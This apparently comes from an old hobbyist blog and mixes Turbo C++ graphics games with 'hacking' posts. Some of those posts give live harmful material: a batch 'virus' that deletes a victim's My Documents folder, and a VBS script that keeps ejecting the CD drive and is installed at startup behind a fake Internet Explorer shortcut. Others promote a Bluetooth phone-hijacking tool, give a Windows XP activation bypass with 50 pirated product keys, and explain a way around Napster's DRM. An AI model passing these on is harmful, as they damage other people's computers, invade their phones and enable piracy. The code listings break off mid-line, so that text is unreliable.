Tuesday, November 27, 2007

animated 3d car in c++

#include
#include(conio.h>
#include(dos.h>
#include(stdlib.h>
#include(process.h>
void main()
{
int gd=DETECT,gm;
initgraph(&gd,&gm,"c:\tc\bgi");
int c=12;
setbkcolor(0);
//setlinestyle(0,1,2);
int t;
while(1)
{
settextstyle(2,0,5);
outtextxy(100,10,"Press L,H ,T,P");
outtextxy(100,30,"Press 1 for Quit");
as:
setcolor(13);
ellipse(380,127,20,152,130,35);
//////////////////////////////rear//////////////////////////
line(490,109,560,142);
line(560,142,569,142);
line(569,142,582,102);
line(582,102,620,92);
line(593,132,617,125);
line(617,124,627,96);
line(620,92,628,97);
line(472,86,602,96);
line(501,113,575,121);
line(443,77,475,80);
line(443,77,432,93);
line(475,80,472,85);
//setcolor(4);
line(593,132,593,137);
line(593,137,600,141);
line(600,141,600,185);
line(600,185,608,192);
line(608,192,608,234);
line(608,234,586,253);
line(586,253,577,248);
///////////////////////// mirror
line(263,112,363,127);
line(193,160,263,112);
line(193,160,220,170);
line(220,170,280,180);
line(280,180,320,185);
line(320,185,363,127);
////////////////////////////////sidemirror
line(340,194,460,169);
line(460,169,519,152);
ellipse(512,144,300,30,10,10);
ellipse(467,143,28,100,50,30);
line(510,128,521,138);
line(435,116,440,171);
// setcolor(4);
////////////////////////////////////////cont//
line(339,194,372,144);
// line(372,140,386,128);
ellipse(454,208,87,123,128,95);
line(372,144,384,128);
int b,x,y;
////////////////////////lower
line(365,298,524,264);
line(365,298,330,310);
line(330,310,323,310);

///////////////////////////////bumper
ellipse(162,221,135,190,90,40);
line(96,193,140,174);
line(140,174,160,168);
line(160,168,192,161);
//////////////////////front
ellipse(75,246,95,190,18,18);
line(57,251,57,286);
//setcolor(4);
ellipse(181,178,232,263,200,137);
ellipse(195,180,256,286,200,137);

ellipse(191,171,228,247,200,100);
ellipse(231,198,234,275,200,80);
//setcolor(9);
//ellipse(195,170,256,286,200,137);
//setcolor(12);
ellipse(196,167,228,246,200,90);
ellipse(231,184,234,276,200,80);

ellipse(191,200,228,246,200,90);
ellipse(228,218,234,276,200,80);
ellipse(258,268,180,220,200,40);
ellipse(178,296,244,355,16,10);
ellipse(238,249,227,250,200,60);

/////////////wheel1
ellipse(302,281,320,77,26,45);
ellipse(290,277,65,162,40,45);
ellipse(278,288,144,212,31,45);
/////////////wheel2
//setcolor(5);
ellipse(302+260,229,328,87,26,45);
ellipse(290+280-7,277-50+2,90,162,40,45);
ellipse(278+270,288-50,144,215,27,45);
b=0;
int v=0;
/////////
ellipse(302+250+v,227+b,295,90,29,41);
ellipse(302+234+v,231+b,245,306,50,40);
//setlinestyle(3,0,3);
ellipse(302+248+v,229+b,0,360,21,30);
ellipse(302+247+v,229+b,0,360,8,10);
setfillstyle(6,11);
//floodfill(302+248+v,230+b,13);
//line(546,201,546,257);
//line(554,201,554,257);
//setcolor(4);
line(546+v,201+b,546+v,220+b);
line(551+v,201+b-2,551+v,220+b);
line(546+v,238+b,546+v,257+b);
line(551+v,238+b+2,551+v,257+b+2);

line(530+v,225+b,541+v,225+b);
line(530+v,230+b,541+v,230);
line(557+v,225+b,570+v,225+b);
line(557+v,230+b,570+v,230+b);

line(563+v,206+b,552+v,222+b);
line(534+v,246+b,543+v,232+b);
line(566+v,210+b,556+v,223+b);
line(536+v,250+b,544+v,238+b);
line(536+v,207+b,546+v,222+b);
line(532+v,213+b,542+v,224+b);
line(556+v,235+b,566+v,247+b);
line(551+v,237+b,563+v,253+b);

////////////////////////////////////////////////////
v=-260;
b=56;
ellipse(302+233+v,221+b,260,60,49,51);
//ellipse(302+234+v,231+b,245,306,50,40);
//setlinestyle(3,0,3);
ellipse(302+243+v,224+b,0,360,28,35);
// line(249,328,269,328);
ellipse(300+245+v,223+b,0,360,10,12);
ellipse(285+249+v,239+b,210,260,30,33);
//floodfill(285+258+v,230+b,12);
b=45;
v=v-4;
line(546+v,201+b,546+v,220+b+2);
line(551+v,201+b,551+v,220+b+2);
b=b+8;
line(546+v,238+b,546+v,257+b+4);
line(551+v,238+b,551+v,257+b+4);
v=v-2;
line(530+v-6,225+b,541+v,225+b);
line(530+v-6,230+b,541+v,230+b);
v=v+5;
line(557+v,225+b,570+v+3,225+b);
line(557+v-1,230+b,570+v+3,230+b);

b=b-5;
v=v-5;
line(565+v+3,206+b,552+v+4,222+b-2);
b=b+15;
line(534+v,246+b,543+v+3,232+b-5);
b=b-10;
line(566+v+7,210+b-5,556+v+4,220+b);
line(536+v-5,250+b,544+v-2,238+b-4);

line(536+v,207+b-8,545+v,222+b-5);
line(531+v,212+b-8,542+v,224+b-2);
line(556+v,235+b,566+v+3,247+b+5);
line(551+v,237+b,563+v+2,253+b+3);
///////////////////lights
ellipse(199,250,144,345,18,8);
line(185,245,206,230);
//setcolor(4);
ellipse(223,234,340,110,8,5);
line(230,237,217,252);
line(206,230,220,229);
//setfillstyle(1,4);
//floodfill(200,240,12);
/////////////////////////////////////
line(90,223,152,236);
line(152,236,137,254);
line(90,223,90,242);
//setfillstyle(10,9);
//floodfill(91,230,14);
ellipse(240,270,104,136,100,60);
ellipse(185,237,120,160,100,60);
ellipse(80,221,357,134,10,10);
line(152,236,168,228);
///////////////////////////////////////////////
line(435,116,440,171);
//////////////////////////////////////////hp
//line(134,185,220,210);
line(134,185,196,160);
line(214,212,318,185);
/////////////////////////////////////////////////light
//setcolor(14);
ellipse(166,247,99,330,8,8);
ellipse(171,243,310,129,7,7);
putpixel(174,250,13);
putpixel(173,251,13);
putpixel(164,239,13);
putpixel(165,238,13);
/////////////////////////////////////////road/////////////////////
setcolor(13);
line(1,430,639,300);
line(1,445,639,315);
line(1,210,93,194);
line(1,195,194,158);
//line(1,170,639,71);
//line(1,170,229,135);
line(520,90,639,71);
line(478,86,639,56);
int c=0;
line(10,194+c,10,208+c);
line(40,189+c,40,204+c);
line(70,183+c,70,198+c);
line(100,176+c,100,190+c);
line(130,170+c,130,177+c);
line(160,166+c,160,168+c);
line(190,160+c,190,161+c);
line(190+330,78+c,190+330,89+c);
line(190+360,72+c,190+360,85+c);
line(190+390,67+c,190+390,81+c);
line(190+420,62+c,190+420,76+c);
line(190+449,57+c,190+449,71+c);

c=236;
line(10,192+c,10,208+c);
line(40,189+c-2,40,204+c-3);
line(70,183+c-3,70,198+c-3);
line(100,176+c-2,100,190+c-2);
line(130,170+c-2,130,177+c+5);
line(160,166+c-3,160,168+c+8);
line(190,160+c-4,190,161+c+9);
line(190+30,156+c-5,190+30,170+c-5);

line(190+30+30,156+c-12,190+30+30,170+c-12);
line(190+90,156+c-18,190+90,170+c-17);
line(190+120,156+c-25,190+120,170+c-25);
line(190+150,156+c-30,190+150,170+c-30);
line(190+180,156+c-37,190+180,170+c-36);

line(190+210,156+c-42,190+210,170+c-42);

line(190+240,156+c-48,190+240,170+c-48);

line(190+270,156+c-55,190+270,170+c-54);

line(190+300,156+c-61,190+300,170+c-61);

line(190+330,78+c+10,190+330,89+c+13);
line(190+360,72+c+11,190+360,85+c+13);
line(190+390,67+c+10,190+390,81+c+10);
line(190+420,62+c+8,190+420,76+c+10);
line(190+449,57+c+8,190+449,71+c+8);


/////////////////road
setcolor(12); /////////////////////////////1
line(1,310,25,306);
line(6,318,30,315);
line(1,310,6,318);
line(25,306,30,314);
int k,m;
k=13*45+19;
m=16*(-8);
//2
setcolor(12);
line(605,310-128,629,306-128);
line(610,318-128,634,315-128);
line(605,310-128,610,318-128);
line(629,306-128,634,314-128);
setcolor(12); //////////////////////////////////3
k=45;
m=-8;
line(46,302,70,298);
line(51,310,75,307);
line(46,302,51,310);
line(70,298,75,306);

setfillstyle(1,0);
floodfill(64,303,12);
setfillstyle(1,14);
floodfill(14,314,12);
floodfill(617,183,12);
setfillstyle(1,0);
floodfill(14,314,12);
floodfill(617,183,12);
setfillstyle(1,14);
floodfill(64,303,12);
t=getch();
if(t=='1')
exit(0);
if(t=='h')
{
sound(710);
delay(500);
nosound();
//break;
}
if(t=='t')
{
while(!kbhit()) {
setfillstyle(1,0);
floodfill(536,213,13);
floodfill(563,213,13);
floodfill(561,244,13);
floodfill(538,244,13);
floodfill(274,295,13);
floodfill(294,295,13);
floodfill(274,265,13);
floodfill(294,265,13);
floodfill(548,250,13);
floodfill(548,214,13);
floodfill(533,228,13);
floodfill(563,228,13);
floodfill(262,281,13);
floodfill(308,281,13);
floodfill(284,251,13);
floodfill(284,295,13);
setfillstyle(1,random(12));
floodfill(200,250,13);
delay(10);
//setfillstyle(1,11);
floodfill(170,250,13);
floodfill(80,230,13);

}
setfillstyle(1,0);
floodfill(200,250,13);
delay(10);
//setfillstyle(1,11);
floodfill(170,250,13);
floodfill(80,230,13);
}

if(t=='l')
{
while(!kbhit())
{
delay(120);
setfillstyle(6,0); //////////////////////////ty
floodfill(536,213,13);
floodfill(563,213,13);
floodfill(561,244,13);
floodfill(538,244,13);
floodfill(274,295,13);
floodfill(294,295,13);
floodfill(274,265,13);
floodfill(294,265,13);
setfillstyle(1,0);
floodfill(64,303,12);
///////////////////////////////////road
setfillstyle(9,0); /////////////////////color
floodfill(81-40+5,419+7,13);
floodfill(151-40,409+7,13);
floodfill(211-40,397+7,13);
floodfill(271-40,380+7,13);
floodfill(331-40,368+7,13);
floodfill(396-40,355+7,13);
floodfill(450-40,345+7,13);
floodfill(510-40,335+7,13);
floodfill(570-40,325+7,13);
floodfill(630-40,312+7,13);

//////////////////////
floodfill(50,197,13);
floodfill(110,177,13);
floodfill(166,165,13);
floodfill(527,86,13);
floodfill(587,71,13);


setfillstyle(6,14); //////////////////////////ty
floodfill(548,250,13);
floodfill(548,214,13);
floodfill(533,228,13);
floodfill(563,228,13);
floodfill(262,281,13);
floodfill(308,281,13);
floodfill(284,251,13);
floodfill(284,295,13);
////////////////////////////////////////road
setfillstyle(9,10);///////////////////////////////////color
floodfill(19,429,13);
floodfill(81,419,13);
floodfill(151,409,13);
floodfill(211,397,13);
floodfill(271,380,13);
floodfill(331,368,13);
floodfill(396,355,13);
floodfill(450,345,13);
floodfill(510,335,13);
floodfill(570,325,13);
floodfill(630,312,13);
//////////////////////////////////////
floodfill(20,197,13);
floodfill(80,187,13);
floodfill(133,174,13);
floodfill(517,86,13);
floodfill(557,81,13);
floodfill(627,70,13);
setfillstyle(1,14);
floodfill(14,314,12);
floodfill(617,183,12);
///////////////////////////////////////
setfillstyle(10,4);
floodfill(302+248,230,13);
floodfill(302+248+v,230+b,13);
///light
setfillstyle(6,11); ///////////
floodfill(200,250,13);
floodfill(170,250,13);
floodfill(80,230,13);
delay(120);
setfillstyle(6,0);/////////////////////ty
floodfill(548,250,13);
floodfill(548,214,13);
floodfill(533,228,13);
floodfill(563,228,13);
floodfill(262,281,13);
floodfill(308,281,13);
floodfill(284,251,13);
floodfill(284,295,13);
/////////////////////////////////////road
setfillstyle(9,0); ///////////////color
floodfill(19,429,13);
floodfill(81,419,13);
floodfill(151,409,13);
floodfill(211,397,13);
floodfill(271,380,13);
floodfill(331,368,13);
floodfill(396,355,13);
floodfill(450,345,13);
floodfill(510,335,13);
floodfill(570,325,13);
floodfill(630,312,13);
///////////////////////////////////////////////////////
floodfill(20,197,13);
floodfill(80,187,13);
floodfill(133,174,13);
floodfill(517,86,13);
floodfill(557,81,13);
floodfill(627,70,13);
/////////////////////////////
setfillstyle(1,0);
floodfill(14,314,12);
floodfill(617,183,12);
setfillstyle(6,10); /////////////ty
floodfill(536,213,13);
floodfill(563,213,13);
floodfill(561,244,13);
floodfill(538,244,13);
floodfill(274,295,13);
floodfill(294,295,13);
floodfill(274,265,13);
floodfill(294,265,13);
////////////////////////////////////////////////road
setfillstyle(9,14);/////////////////////////////////////////color
floodfill(81-40+5,419+7,13);
floodfill(151-40,409+7,13);
floodfill(211-40,397+7,13);
floodfill(271-40,380+7,13);
floodfill(331-40,368+7,13);
floodfill(396-40,355+7,13);
floodfill(450-40,345+7,13);
floodfill(510-40,335+7,13);
floodfill(570-40,325+7,13);
floodfill(630-40,312+7,13);
/////////////////////////////////////////
floodfill(50,197,13);
floodfill(110,177,13);
floodfill(166,165,13);
floodfill(527,86,13);
floodfill(587,71,13);
setfillstyle(1,14);
floodfill(64,303,12);
setfillstyle(9,4);
floodfill(302+248,230,13);
floodfill(302+248+v,230+b,13);
delay(20);
setfillstyle(1,14);
floodfill(200,250,13);
floodfill(170,250,13);
floodfill(80,230,13);
delay(20);
setfillstyle(1,0);
floodfill(200,250,13);
floodfill(170,250,13);
floodfill(80,230,13);


} }


if(t=='p')
{
int n=0;
while(!kbhit())
{
if(n<=60)
n++;
setcolor(0);
rectangle(1+1,-10,90-1,-12+n);
delay(14);
setcolor(9);
rectangle(1,-10,90,-10+n);
if(n==60)
{
outtextxy(10,10,"L-LIGHTS");
outtextxy(10,20,"H-HORN");
//outtextxy(10,30,"T-AllOY");
delay(400);
}

}
setcolor(0);
rectangle(1,-10,90,-10+n);
rectangle(1,-10,90,-11+n);
outtextxy(10,10,"L-LIGHTS");
outtextxy(10,20,"H-HORN");
//outtextxy(10,30,"T-AllOY");
}
}

circle(300,100,3);
nosound();
getch();
}

Monday, November 26, 2007

mobile bluetooth hacker

mobile bluetooth hacker

Yes guys it is the super mobile bluetooth hacker
Once connected to a another phone via bluetooth you can:
- read his messages
- read his contacts
- change profile
- play his ringtone even if phone is on silent
- play his songs(in his phone)
- restart the phone
- switch off the phone
- restore factory settings
- change ringing volume
- And here comes the best
Call from his phone" it includes all call functions like hold etc.
Notes:
1.) When connecting devices use a code 0000
2.) At start of programm on smartphones do not forget to turn on bluetooth before start of the application
What else you want
Just go and download it
download
enjoy and keep visiting us

Sunday, November 25, 2007

CREATING A VIRUS

HERE'S A WAY I FOUND TO DELETE THE MY DOCUMENTS FOLDER OF UR ENEMY OR JUST 4 FUN.HERE'S WHAT U SHOULD DO.


OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A BAT FILE.I MEAN SAVE IT LIKE MYVIRUS.BAT.IT SHOULD HAVE THE ENDING AS .BAT.NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.


rmdir C:\Documents and Settings \S\Q.

things you didn't know about Windows XP

. It boasts how long it can stay up. Whereas previous versions of Windows were coy
about how long they went between boots, XP is positively proud of its stamina.
Go to the Command Prompt in the Accessories menu from the All Programs start button option,
and then type 'systeminfo'. The computer will produce a lot of useful info, including the
uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file
called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first.
Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration,
Administrative Templates, Windows Components, Windows Explorer and find the Do not move
deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal
a great many interface and system options, but take care -- some may stop your computer
behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut
on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,
LockWorkStation' in the location field. Give the shortcut a name you like.
That's it -- just double click on it and your computer will be locked. And
if that's not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger,
but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the
text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can
then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows
Components and there will be your prey, exposed and vulne

Hack Xp Pirated to Xp Legal

Hack Xp Pirated to Xp Legal :d ..::!2@V@!V::..


Okay here's a quick fix for all you who have illegal XP's and want to be able to do what those who have legal versions can do. If you can read instructions, you'll have no trouble, if not, I don't take responsibility for it!



1) ) Go to Start, Run, type regedit
2) Browse to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents
3) In the right-hand pane, double click on the value "OOBETimer"
4) Change one of these characters to another random character (it really doesn't matter which, the idea is to corrupt the key so that we un-activate our copy of Windows) and press OK
5) I've generated keys for you so use one of the following:

HFRJP-BVYWW-C8C63-F36MJ-GMDQD
KD2YT-4YT3T-4VQQX-43WBV-FDF3M
CX633-TT3DV-VQP3F-94DKT-3MRR3
W6GHC-TXPFC-V79P2-BCHDQ-DJV3W
J3TGH-CPY32-CCXCW-C6FQF-DFBHB
F2GW6-TMPJT-VH2GF-9G3XM-G9GYD
J9QWM-JP8BX-M9C2F-JJXYH-WTD7B
K4YHK-GQRXD-7T773-YGYYJ-68JBJ
G96J2-2WYMR-9BFMP-MQRJT-XCXV6
CT7TY-2VTY4-PMPGF-2PQFH-Q8HPT
QX2V4-2V76D-XH8PV-RQQT9-QJMBT
PX83Q-RXY8T-TRXQM-CDHFB-78BGG
PDCV3-3V282-DXMVJ-V6HGJ-P9JHQ
JMRCY-4QMYM-J3BVJ-BQJWF-2HTKJ
BRYJV-CFWKX-JYDM9-RDW34-PRV46
KKH9W-PR2XY-XFYXW-R4C2R-XFXJ3
W4DTB-P33VR-G26PF-4BW39-WP2Q3
KMT4R-W6RPC-CQJX3-YDM9C-BV24Y
PCM2H-JPK8V-TCTBM-3KFB2-33488
CXRYY-TM77D-92JJX-44DX8-8RW9M
D62H3-XTG8F-2RMTX-KG938-9RYCJ
R2TJC-YTHTC-B7GVQ-RJ6W8-GT9KW
HJHYP-P7Q6B-D6HP9-2WPT2-3BFPQ
FKK2C-6R3DR-M6PFW-4KYTT-PDWFT
TRYD9-P4CQB-6M3D6-V38JW-VX6RQ
VP78X-YYK8K-3JJ68-88JBR-G3RV6
VQHHH-M9GJF-JKRVX-DCQVC-MFR8G
HYYP3-TRB3T-QKCH2-VCMGG-FHFPJ
JHR24-6R3BT-6TV28-KR7KM-JRXBB
P9XGQ-P28TT-X92FQ-TKKKJ-YYG8D
KR984-244TH-2H362-DFM7V-GDJ7G
Q7G9T-HWPXX-444W4-JD66G-27F2Y
G342Y-CKTW3-4VKBR-CW8XP-H6C3M
BPQMQ-RVJQT-WPCGR-P724W-GR2DQ
V2QPR-D4YMK-BRCT3-3D8M2-DM238
TC2KV-93BGP-7D8TK-T7FB7-6VKVM
PTQYY-YQT3V-GQXW2-7Y8TP-V4B8G
VC3XJ-TR9VY-J3RW3-RHFQB-7WVH3
JF2PQ-TT973-V9FGQ-KCBTF-2YBJD
JK6XC-4K7JR-69MMM-T98HR-JTRF8
BY46T-9KBKT-RBKHY-V6YP9-GKVQJ
KXGVX-2R9QB-CG83F-GMCDK-DMTVD
T6K2F-VH9HH-4W9WY-7JX99-CCHYB
TVPWG-KKPM8-FRWGM-JD7C4-TQ9JW
RCDFP-CXP4T-YYYXJ-PJ72W-W2B73
HTDVM-2J9JF-7FB8T-WRCBX-DXX8D
WWCM4-V6RTV-38QHF-BF72G-DR98B
K7RDG-MYR34-WRBG7-237YV-RX8D6
JF33Y-323QW-QWPF6-9DTVQ-JTR8Q
TPKJY-2XBTC-GH87P-62886-Q69RD

6) Go to Start, Run, and type C:\windows\system32\oobe\msoobe.exe /a, obviouslly replace C: with the drive letter that Windows is installed to.
7) Select the option to activate by phone, and press Next
8) Click the button at the bottom labelled "Change Product Key"
9) Enter the new product key that the keygen created, and click Update
10) When the key is updated, do not continue with the activation process, close the activation window!

There are 50 unique keys and let me know if any don't work. There's about a 99% success rate with these keys so there may be one that doesn't work. Try another.

Play with ur friends

Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!

Click on start>run(win key+r)

Then tpye “regedit” there, this opens up the registry editor, now goto

HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Wi

ndows>CurrentVersion>Explorer

Then set “NoClose”=”DWORD:1

Winamp Hacking Fr Unlimited Music


Using a loophole in a winamp plugin, you can download and burn music from Napster for free.


music CDs, zero dollars*, obtained legally.
*Not including the cost of blank CDs


Practical how to:


0. Download and install Napster, sign up for 14 day free trial.
1. Download and install Winamp
2. Download and install the Winamp Plug-in Output Stacker
3. Open Winamp Options->Plug-ins->Output->Dietmar's Output Stacker->Configure


a. Add out_ds.dll from Winamp/Plug-ins folder
b. Add out_disk.dll from Winamp/Plug-ins folder
c. Select out_disk.dll in the Output Stacker->Configure
d. Set the output directory and output file mode to Force WAV file
e. Exit preferences


4. Load downloaded Napster protected WMAs into your Winamp playlist
5. Press play and each file will be converted to WAV as it plays
6. Burn WAVs to CD with your favorite burning program



Theoretical fun:


Three computers, one fast networked drive, and a few dedicated people: Turning Napster's 14 day free trial into 252 full 80 minute CDs of free music.
New key developments:

-If you use the "Out-lame" Winamp plugin in the Output Stacker in place of "Out-disk", you can convert straight to MP3. It still encodes no faster than realtime, but this is a great way to conserve space. WAV(Out-disk) is still recommended if you are burning CDs and want to keep as much quality as possible. I can confirm that this all works.

-You can run multiple instances of Winamp at once, each converting its own song. Each instance's playback will not interfere with any of the others, illustrating the fact that this is not simply recording the music off of your soundcard. Doing this, you can get FAR MORE than 252 full 80 minute CDs within 14 days. I can confirm that this works.

You can transcode(MP3) or decode(WAV) X albums in the time it takes for the longest track on the album to elapse. And since you're not limited to only tracks from one album at a time, you can trans/decode as many tracks as instances of Winamp your computer will run limited only by your computer's resources.
Quote from Napster's official statement:

"It would take 10 hours to convert 10 hours of music in this manner."
With the updated methods, you can convert 100 hours or 1,000 hours or 10,000 hours of music in 10 hours. The only limit is your computing resources.
Here i am gonna show you a basic VBS script that opens a cd drive every time found closed. so ultimately always opens CD drive till closed just copy paste this code into Notepad (any basic ANSI standard text editor) and save as CDfun.vbs and dont forget the .vbs part


set wmp = createObject("wmplayer.ocx.7")
set drives = wmp.cdromCollection

sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count - 1
drives.item(i).eject()
next
end if
loop
end sub

open_saysame()


now this is funny but what if it was even funnier. what if every time you started you r computer it loaded? that could make it even better... so open a new notepad document (blank) and insert this code into it NOTE: numbered to show which line it is.

1:)copy CDfun.vbs "c:\Documents and Settings\%username%\Start Menu\Programs\Startup\"
2:)CDfun.vbs

Save this as run.bat, now comes the fun part. all you need to do is get them to somehow open this run.bat. there are many ways. one way is to make a shortcut to it called "internet Explorer" and right click to change properties on icon. that way it will look just like Internet Explorer.

The First Card Game in C++

#include
#include
#include
#include
#include
#include
#include
#include
void*image1;
void*image;
float a[51],bp[40],cp[40],dp[40];
int
key,car=5,var,next,esc,taken,chum,remark,bli=3,k,number,q,marksum,mon,kal=
0,jai[3],sub,symb,dont,chance=2,repe=0,repeat=0;
int shuf,player=1,guess,remain=0,count=0,mark[3];
float play[3],greatest,great=232,small,remai,in1[3],in2[3],in3[3];
char wini[4][35]={" You have done it man. Well done"," You are cool
man","
a wonderful game"," you are the best"};
char losi[4][35]={" You should improve your play"," Show me a better
game
next time"," I didn't feel any competition"," Better luck next time"};
char uttar='n';
char egg,help[39],place[3][10]={"player","cpu2","cpu1"};

int get_scancode()
{
union REGS inregs, outregs ;

while( !kbhit( ) )
;

inregs.h.ah = 0 ;
int86(22, &inregs, &outregs) ;
return ( outregs.h.ah ) ;
}

void drawbox(char z[120])
{
setcolor(15);
setviewport(0,0,639,75,1);
clearviewport();
setviewport(0,0,639,479,1);
rectangle(0,0,639,75);
outtextxy(10,10,"message box:-");
outtextxy(30,25,z);
}

class board
{
int bk,x1,y1,x2,y2;

public:

board(void)
{
x1=0;
y1=76;
x2=639;
y2=376;
}

void draw(void)
{
setcolor(15);
setbkcolor(BLACK);
rectangle(0,377,639,479);
rectangle(260,455,314,475);
rectangle(324,455,378,475);
setfillstyle(1,GREEN);
floodfill(2,379,15);
outtextxy(270,463,"PLAY");
outtextxy(334,463,"TAKE");
outtextxy(10,387,"Your Hand -");
rectangle(0,76,639,376);
rectangle(0,150,20,250);
rectangle(615,150,639,250);
rectangle(269,376,369,359);
settextstyle(0,1,2);
outtextxy(20,160,"CPU 1");
outtextxy(639,160,"CPU 2");
settextstyle(0,0,1);
outtextxy(290,365,"YOURSELF");
settextstyle(0,0,0);
setfillstyle(1,BLUE);
floodfill(300,300,15);
}

void play1(float,int);

}plai;

void board::play1(float ax,int cx)
{
int x,y,no;
switch(cx)
{
case 1:{
x=71;
y=210;
no=210;
}break;
case 2:{
x=310;
y=307;
no=50;
}break;
case 3:{
x=560;
y=190;
no=230;
}break;
}
int sym=int((ax*10 -int(ax)*10)+0.1);
char symb[2];
symb[0]=char(sym);
symb[1]='

A excellent snake game develped in c/c++.

#include
#include
#include
#include
#include
#include
#include
#include


void main(void)
{
int gdriver = DETECT, gmode, errorcode;
void
*body,*food,*tail1,*tail2,*tail3,*tail4,*head1,*head2,*head3,*head4;
int x, y,X[5000],Y[5000],i=3,
maxx,maxy,speed=100,bo=10,t[10],score=0,hscore=20;
unsigned int size;
char a='6',b,scor[4],hs[4];
int k=2,l,r1,r2,f=0,z=100,first=0,second=1;;
r1=300;
r2=350;

ifstream infile("c:\tc\bin\rattle.txt");
infile.getline(hs,4);
infile.close();
hscore = atoi(hs);



/* initialize graphics and local variables */
initgraph(&gdriver, &gmode, "c:\tc\bgi");

/* read result of initialization */
errorcode = graphresult();
if (errorcode != grOk) /* an error occurred */
{
printf("Graphics error: %s
", grapherrormsg(errorcode));
printf("Press any key to halt:");
getch();
exit(1); /* terminate with an error code */
}
maxx = getmaxx();
maxy = getmaxy();
y = 160;
x = 80;
for(int j=0; j<=3; j++)
{
X[i-j]=x-bo*(j+1);
Y[i-j]=y;

}

//body

setfillstyle(1,2);
bar(10,10,20,20);
setcolor(0);
setlinestyle(0,1,3);
line(9,9,21,21);
line(9,21,21,9);
size = imagesize(10,10,20,20);
body = malloc(size);
getimage(10,10,20,20,body);
cleardevice();

setcolor(0);
//tail1-right
t[0]=20; t[1]=10;
t[2]=10; t[3]=10;
t[4]=20; t[5]=15;
t[6]=10; t[7]=20;
t[8]=20; t[9]=21;
fillpoly(5, t);
size = imagesize(10,10,20,21);
tail1 = malloc(size);
getimage(10,10,20,21,tail1);
cleardevice();

//tail2-left
t[0]=10; t[1]=10;
t[2]=20; t[3]=10;
t[4]=10; t[5]=15;
t[6]=20; t[7]=20;
t[8]=10; t[9]=21;
fillpoly(5, t);
size = imagesize(10,10,20,21);
tail2 = malloc(size);
getimage(10,10,20,21,tail2);
cleardevice();

//tail3-up
t[0]=10; t[1]=20;
t[2]=10; t[3]=10;
t[4]=15; t[5]=20;
t[6]=20; t[7]=10;
t[8]=20; t[9]=21;
fillpoly(5, t);
size = imagesize(10,10,20,21);
tail3 = malloc(size);
getimage(10,10,20,21,tail3);
cleardevice();

//tail4-down
t[0]=10; t[1]=10;
t[2]=10; t[3]=21;
t[4]=15; t[5]=10;
t[6]=20; t[7]=21;
t[8]=20; t[9]=10;
fillpoly(5, t);
size = imagesize(10,10,20,21);
tail4 = malloc(size);
getimage(10,10,20,21,tail4);
cleardevice();

//head1-right
setlinestyle(1,1,1);
setcolor(2);
fillellipse(10,10,10,5);
setcolor(4);
//eyes
fillellipse(15,7,1,1);
fillellipse(15,13,1,1);
size = imagesize(10,5,20,15);
head1 = malloc(size);
getimage(10,5,20,15,head1);

//head2-left
//eyes
fillellipse(5,7,1,1);
fillellipse(5,13,1,1);
size = imagesize(0,5,10,15);
head2 = malloc(size);
getimage(0,5,10,15,head2);
cleardevice();

//head3-up
//eyes
setcolor(2);
fillellipse(12,12,5,10);
setcolor(4);
fillellipse(9,6,1,1);
fillellipse(15,6,1,1);
size = imagesize(7,2,18,12);
head3 = malloc(size);
getimage(7,2,18,12,head3);


//head4-down
//eyes
fillellipse(9,17,1,1);
fillellipse(15,17,1,1);
size = imagesize(7,12,18,22);
head4 = malloc(size);
getimage(7,12,18,22,head4);
cleardevice();


//food
setcolor(15);
setfillstyle(1,15);
fillellipse(10,10,3,5);
size = imagesize(5,3,15,17);
food = malloc(size);
getimage(5,3,15,17,food);
cleardevice();

/* repeat until a key is pressed */

maxx=getmaxx();
maxy=getmaxy();
setlinestyle(0,1,3);
setcolor(9);
rectangle(0,0,maxx,maxy);
setlinestyle(0,1,2);
line(maxx-150,0,maxx-150,maxy);
setcolor(8);
setfillstyle(1,8);
bar(maxx-147,3,maxx-3,63);
setcolor(12);
int maze=1;
if(maze==1)
{
setfillstyle(1,6);
bar(4,4,maxx-154,14);
bar(4,4,14,maxy-4);
bar(4,maxy-4,maxx-154,maxy-14);
bar(maxx-154-10,4,maxx-154,maxy-4);
}


settextstyle(0,0,1);
delay(300);
outtextxy(maxx-125,30,"RATTLE SNAKE");
delay(300);
setcolor(11);
setlinestyle(0,1,2);
rectangle(maxx-145,65,maxx-5,205);
outtextxy(maxx-128,70,"INSTRUCTIONS");
delay(200);
setcolor(6);
outtextxy(maxx-140,90,"Commands Key");
delay(300);
setcolor(8);
outtextxy(maxx-140,110," Move Up 8");
delay(50);
outtextxy(maxx-140,130," Move Down 5");
delay(50);
outtextxy(maxx-140,150," Move Right 6");
delay(50);
outtextxy(maxx-140,170," Move Left 4");
delay(50);
outtextxy(maxx-140,190," Exit 0");
delay(200);
setcolor(12);
setlinestyle(0,1,2);
rectangle(maxx-145,210,maxx-5,350);
setcolor(1);
outtextxy(maxx-130,220,"Player's Name");
setcolor(15);
outtextxy(maxx-100,230,"hiral");
setcolor(4);
delay(200);
itoa(score,scor,10);
outtextxy(maxx-140,250,"Score");
outtextxy(maxx-50,250,scor);
delay(200);
setcolor(10);
outtextxy(maxx-140,280,"Level");
delay(200);
setcolor(13);
outtextxy(maxx-140,310,"Maze 1");
delay(200);
setcolor(14);
outtextxy(maxx-140,340,"High Score ");
outtextxy(maxx-50,340,hs);

for(j=0; j<=1000; j++)
{
putpixel(random(maxx-150),random(maxy),6);
delay(1);
}

while (a!='0')
{

// plot new image
if(a=='6')
